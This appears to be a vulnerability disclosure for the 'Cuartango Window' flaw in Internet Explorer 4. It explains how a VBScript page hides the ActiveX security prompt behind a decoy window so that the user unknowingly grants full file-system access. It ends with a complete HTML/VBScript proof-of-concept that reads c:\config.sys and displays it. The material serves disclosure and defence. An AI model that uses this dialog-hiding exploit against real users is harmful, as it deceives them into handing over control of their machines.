cuartango-window.txt

`Cuartango Window   
  
http://pages.whowhere.com/computers/cuartangojc/cuartangow1.html  
  
Affected software  
Microsoft Internet Explorer 4  
  
  
Risks  
Your computer is at risk a malicious VBScript can get full control over your system.  
The VBScript can de everything : delete files, install viruses, read your files ...  
  
  
Technical description  
When Microsoft Internet Explorer detects that a Visual Basic Script included in an HTML page will  
create an object ("CreateObject" sentence) your file system a security alert dialog is displayed :  
  
  
  
Nobody with a minimum knowledge about ActiveX and VB Scripts would accept this dialog. If you click  
the "yes" button your have given FULL CONTROL of your machine to the VB Script code.  
The vulnerability comes from the fact that is possibleto hide this dialog box and get FULL CONTROL  
over the victim machine.   
The key idea is very simple : just display a window over the security alert hiding the message and  
replacing it by another friendly message but keeping visible the buttons of the original message.  
  
I will show you how the malicious script will work :  
  
First we open a friendly window (The Cuartango Window) :  
  
set wcover = window.open ("welcome.htm", "Welcome . . . )  
  
Next instruction will generate the security alert because we are accesing the file system this  
prompt will be behind the welcome window !!!  
  
Set fs = CreateObject("Scripting.FileSystemObject")  
  
At this moment instead of the alert shown above what we see is :  
  
  
  
  
  
If the YES button is clicked the script has FULL CONTROL. The welcome window in no longer needed and  
we close it  
  
wcover.close  
  
At this point we are the script owns the machine as an, example I will get the autoexec.bat file  
and display it in a text box. But the script could do everything on your machine, delete all your  
files, install a virus ...  
  
Set myfile = fs.OpenTextFile("c:\config.sys")  
content = myfile.readall  
myfile.Close  
document.form1.s1.value = content  
  
  
----------exploit code example----------  
  
<html>  
  
<head>  
<meta name="description" content="Explorer vulnerability : Cuartango Window hole">  
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">  
<meta name="keywords"  
content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">  
<title>Cuartango Window demo</title>  
</head>  
  
<body bgcolor="#C0C0C0">  
<script language="VBScript">  
  
if instr(1,navigator.userAgent,"MSIE") = 0 then   
msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye"  
window.navigate "http://www.microsoft.com"  
end if  
if window.screen.width <> 800 then   
alert "Your screen resolution must be 800 x 600"  
window.navigate "cuartangow1.html"  
else ' coordinates given for 800 x 600  
set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")  
Set fs = CreateObject("Scripting.FileSystemObject")  
wcover.close  
Set myfile = fs.OpenTextFile("c:\config.sys")  
content = myfile.readall  
myfile.Close  
end if  
  
</script>  
  
  
<h1 align="center"><font color="#FF0000">Cuartango Window Demo</font></h1>  
  
<p align="center"><strong>This example shows you how ActiveX could destroy your system.  
&nbsp; As an example I have read your config.sys file</strong><br>  
Back to <a href="cuartangow1.html">Cuartango Window Page</a></p>  
  
<form method="POST" name="form1">  
<div align="center"><center><p><textarea rows="18" name="S1" cols="49"></textarea></p>  
</center></div>  
</form>  
<script language="VBScript">  
  
document.form1.s1.value = content  
  
</script>  
  
  
<p>&nbsp;</p>  
</body>  
</html>  
`